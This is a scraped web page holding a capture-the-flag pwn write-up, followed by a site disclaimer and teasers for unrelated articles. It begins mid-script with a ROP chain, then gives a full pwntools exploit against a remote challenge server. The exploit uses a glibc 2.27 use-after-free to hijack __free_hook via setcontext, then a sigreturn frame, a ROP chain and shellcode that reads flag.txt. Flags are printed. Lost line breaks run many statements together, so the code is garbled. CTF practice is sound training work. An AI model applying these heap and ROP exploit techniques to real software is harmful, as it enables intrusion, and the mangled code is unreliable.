orw1 = flat([pop_rdi, stack+0xc8, pop_rsi,0, pop_rdx,0,0, pop_rax,2, syscall,  # openpop_rdi, 3, pop_rsi, 0x100080, pop_rdx,0x400,0, pop_rax,0x4e, syscall,  # getdents64pop_rdi, 1, pop_rax,1, syscall # write
]) + b'.\x00'debug(0, orw)#gdb.attach(p)
p.interactive()#ISCC{DoKPWB4BnBZ5Afjmst5brJvr4SHvm74HMhVF}

unheap

libc-2.27 UAF 写__free_hook setcontext+53 再写shellcode

from pwn import *context(arch='amd64', log_level='debug')
libc = ELF('/home/kali/glibc/libs/2.27-3ubuntu1.5_amd64/libc-2.27.so')
#elf = ELF('./unheap')#p = process('./unheap')
p = remote('182.92.237.102', 10030)def add(size, msg=b'A'):p.sendlineafter(b">> ", b'1')p.sendlineafter(b"[*] Note data size: ", str(size).encode())p.sendafter(b"[*] Note content: ", msg)def free(idx):p.sendlineafter(b">> ", b'2')p.sendlineafter(b"[*] Note index: ", str(idx).encode())def edit(idx, msg):p.sendlineafter(b">> ", b'3')p.sendlineafter(b'[+] Note index: ', str(idx).encode())p.sendafter(b"[*] Note data: ", msg)def show(idx):p.sendlineafter(b">> ", b'4')p.sendlineafter(b"[*] Note index: ", str(idx).encode())#heap = 0x280 libc-2.27 ?
for i in range(8):add(0x80)add(0x28)
add(0x28)
for i in range(8):free(i)show(7) #ca0
p.recvuntil(b': ')
libc.address = u64(p.recv(6)+b'\0\0') - 0x60 - 0x10 - libc.sym['__malloc_hook'] #libc.sym['main_arena']
print(f"{libc.address = :x}")#
syscall = next(libc.search(asm("syscall\nret"))) 
free_hook = libc.sym['__free_hook']
#
frame = SigreturnFrame()
frame.rax=0 # read
frame.rdi=0 # argv fd
frame.rsi=free_hook&0xfffffffffffff000 #argv ptr
frame.rdx=0x200                        #argv size
frame.rsp=free_hook&0xfffffffffffff000 #retrun
frame.rip=syscall                     #calladd(0x100, flat(frame)) #10free(8)
free(9)
edit(9, p64(libc.sym['__free_hook']))add(0x28) #11
add(0x28, p64(libc.sym['setcontext']+53))  #__free_hook -> setcontext+53free(10)  #layout = [libc.address + 0x000000000002164f , free_hook & 0xfffffffffffff000,libc.address + 0x0000000000023a6a , 0x2000,libc.address + 0x0000000000001b96 , 7,libc.address + 0x000000000001b500 , 10,syscall, #: syscall; ret;next(libc.search(asm("jmp rsp"))), #: jmp rsp;
]shellcode = asm('''
sub rsp, 0x800
push 0
mov rax, 0x7478742e67616c66
push rax
mov rdi, rsp
xor esi, esi
mov eax, 2
syscallcmp eax, 0
js failedmov edi, eax
mov rsi, rsp
mov edx, 0x100
xor eax, eax
syscallmov edx, eax
mov rsi, rsp
mov edi, 1
mov eax, edi
syscalljmp exitfailed:
push 0x6c696166
mov edi, 1
mov rsi, rsp
mov edx, 4
mov eax, edi
syscallexit:
xor edi, edi
mov eax, 231
syscall
''')
p.sendline(flat(layout) + shellcode)#gdb.attach(p)
#pause()
p.interactive()
#ISCC{BdjoU07jthSphGMZ6Bn58l5sIEtOSAa44kEh}

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.mzph.cn/news/843342.shtml

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

Android11 事件分发流程

在Android 11 输入系统之InputDispatcher和应用窗口建立联系一文中介绍到&#xff0c;当InputDispatcher写入数据后&#xff0c;客户端这边就会调用handleEvent方法接收数据 //frameworks\base\core\jni\android_view_InputEventReceiver.cpp int NativeInputEventReceiver::h…

学校机房搞机、摸鱼

平时去机房上课&#xff0c;老师讲得很无趣&#xff0c;自己又不感兴趣&#xff0c;想干其他的&#xff0c;但是老师控制了屏幕&#xff0c;没法摸鱼&#xff0c;这时就需要学习搞机技术了。 解除还原&#xff1f; 学校机房的电脑都装有自动还原功能&#xff0c;每次关机或重…

炒黄金怎么追单?-融知财经网

在黄金投资领域,当市场行情呈现出有利的走势时,许多交易者会选择追加下单以扩大盈利。追单作为一种投资策略,旨在利用市场波动获取额外收益。然而,要想在追单中取得成功,需要掌握一定的技巧和策略。融知财经网给介绍黄金交易中追单的一些关键技巧,帮助投资者理智追单,稳健获利。…

线性插值的频域特性

1、抽取和插值的简单说明 抽取和插值是变采样过程中常用的两种手段&#xff0c;其中抽取的目的是降低数据的采样率&#xff0c;以降低对系统存储深度或计算量的要求。插值的目的是提高数据的采样率&#xff0c;以提高系统的计算精度。 M M M倍抽取通常是通过每隔 M M M…

Docker安装Nginx 并实现通过nginx部署静态网址

Docker镜像就是一个只读的模板&#xff0c;可以用来创建Docker容器。 例如&#xff1a;一个镜像可以包含一个完整的centos操作系统环境&#xff0c;里面仅安装了mysql、nginx等或用户需要的其他应用程序。 Docker提供了一个非常简单的机制来创建镜像或者更新现有的镜像&#…

GTD时间管理法

Part 1. What is GTD? | 什么是GTD&#xff1f; GTD is a framework that enhances focus and productivity. Through techniques such as capturing all tasks in a trusted system and breaking down complex projects into actionable items, GTD allows individuals to co…

美业系统SaaS收银系统源码-顾客在系统付款了但系统未显示怎么办?美业系统实测

美业SaaS系统 连锁多门店美业收银系统源码 多门店管理 / 会员管理 / 预约管理 / 排班管理 / 商品管理 / 活动促销 PC管理后台、手机APP、iPad APP、微信小程序 1. 提供门店名称、付款凭证和会员手机号 2. 到订单明细查询&#xff0c; 按门店名称和会员手机号查询看是否有相…

百度智能云千帆AppBuilder升级!开放多源模型接入,思考模型再次加速!

>>【v0.5.4版本】 上线时间&#xff1a;2024/5/24 关键发版信息&#xff1a; 大模型优化&#xff1a;开放多源模型接入&#xff0c;思考模型再次加速&#xff01; Agent思考模型&#xff1a;新增AppBuilder专用版模型ERNIE Speed-AppBuilder&#xff0c;自主任务规划…

【软考】下篇 第15章 面向服务架构设计理论与实践

目录 一、SOA定义二、微服务微服务优势微服务与SOA对比微服务架构模式方案微服务设计约束 三、SOA参考架构四、SOA设计的标准要求五、SOA设计原则六、SOA设计模式七、SOA实施 一、SOA定义 面向服务的体系结构 (Service-Oriented Architecture,SOA), 从应用和原理的角度看&…

openLayers加载wms图层并定位到该图层

openLayers定位到wms图层 我们的wms是加载geoserver发布的服务&#xff0c;wms加载的图层是没法通过layer.getSource().getExtent()来获取到extents&#xff08;边界&#xff09;的&#xff1b;实现思路是通过postgis的函数(st_extent(geom))来获取extents; 返回前端后格式化一…

23-LINUX--TCP连接状态

一.TCP服务的特点 传输层协议主要有两个&#xff1a;TCP 协议和 UDP协议。TCP 协议相对于UDP协议的特点是&#xff1a;面向连接、字节流和可靠传输。 使用TCP协议通信的双方必须先建立连接&#xff0c;然后才能开始数据的读写。双方都必须为该连接分配必要的内核资源&a…

lammps案例:reaxff势模拟Fe(OH)3高温反应过程

大家好&#xff0c;我是小马老师。 本文分享一个reaxff反应势的案例。 该案例主要模拟Fe(OH)3在高温下的反应过程&#xff0c;主要代码来自lammps自带的案例。 lammps自带案例没有产物输出&#xff0c;故在此基础上稍加修改&#xff0c;增加了产物输出命令。 反应过程如下图…

解读大模型应用的可观测性

一、引言 随着人工智能技术的飞速发展&#xff0c;大模型作为AI领域的重要分支&#xff0c;正日益成为科技竞争的新高地。大模型通过输入大量语料进行训练&#xff0c;赋予计算机拥有像人类一样的“思考”能力&#xff0c;使其能够理解文本、图片、语音等内容&#xff0c;并进…

JavaWeb开发 3.Web开发 Web前端开发 ③ HTML、CSS

没有一朵花&#xff0c;一开始就是一朵花 —— 24.5.28 HTML、CSS知识在博主前端专栏&#xff0c;可以对照博客大致进行了解 https://blog.csdn.net/m0_73983707/category_12654678.htmlhttps://blog.csdn.net/m0_73983707/category_12654678.html

5. CSS的边框和阴影

第5章 边框与阴影 CSS3 为开发者提供了强大的工具&#xff0c;使得我们可以更容易地为网页元素添加视觉效果。这一章将详细介绍边框和阴影的新特性&#xff0c;包括如何使用圆角边框、边框图像、盒阴影和文本阴影&#xff0c;并展示一些实际应用的例子。 5.1 圆角边框&#x…

232转Profinet网关接扫码枪与PLC通讯在物流分拣线上的应用

一、背景 随着生活节奏的加快&#xff0c;网络购物需求非常大&#xff0c;从而造成快递站需要快速提取快递信息已达到快速出站的效果&#xff0c;这就用到了扫码枪&#xff0c;扫码枪作为采集设备&#xff0c;能够迅速准确地读取货物信息。并将数据传输至PLC控制器&#xff0c…

5.28OpenMV入门

10分钟快速上手 OpenMV中文入门教程 使用的元件 先安装好&#xff0c;上述链接上手 IDE显示颜色阈值&#xff0c;同时也配有示例文件&#xff0c;如下图打开&#xff0c;helloworld 你好&#xff0c;世界&#xff01; OpenMV中文入门教程&#xff0c;在官方也有每一个的详细…

JUC总结1

线程和进程的对比 进程是操作系统资源分配的最小单位&#xff0c;其包含了进程控制块、程序、数据等&#xff0c;在电脑上启动的一个个应用程序就是进程&#xff0c;当一个程序要被运行时&#xff0c;从磁盘中将这个应用程序的代码加载到内存中&#xff0c;就开启了一个进程。…

音乐系统java在线音乐网站基于springboot+vue的音乐系统带万字文档

文章目录 音乐系统一、项目演示二、项目介绍三、万字项目文档四、部分功能截图五、部分代码展示六、底部获取项目源码和万字论文参考&#xff08;9.9&#xffe5;带走&#xff09; 音乐系统 一、项目演示 在线音乐系统 二、项目介绍 基于springbootvue的前后端分离在线音乐系…

【Python设计模式14】状态模式

状态模式&#xff08;State Pattern&#xff09;是一种行为型设计模式&#xff0c;它允许对象在其内部状态改变时改变其行为。状态模式将不同状态的行为封装到不同的状态类中&#xff0c;使得状态之间的转换独立于对象本身&#xff0c;减少了条件语句的使用&#xff0c;提高了代…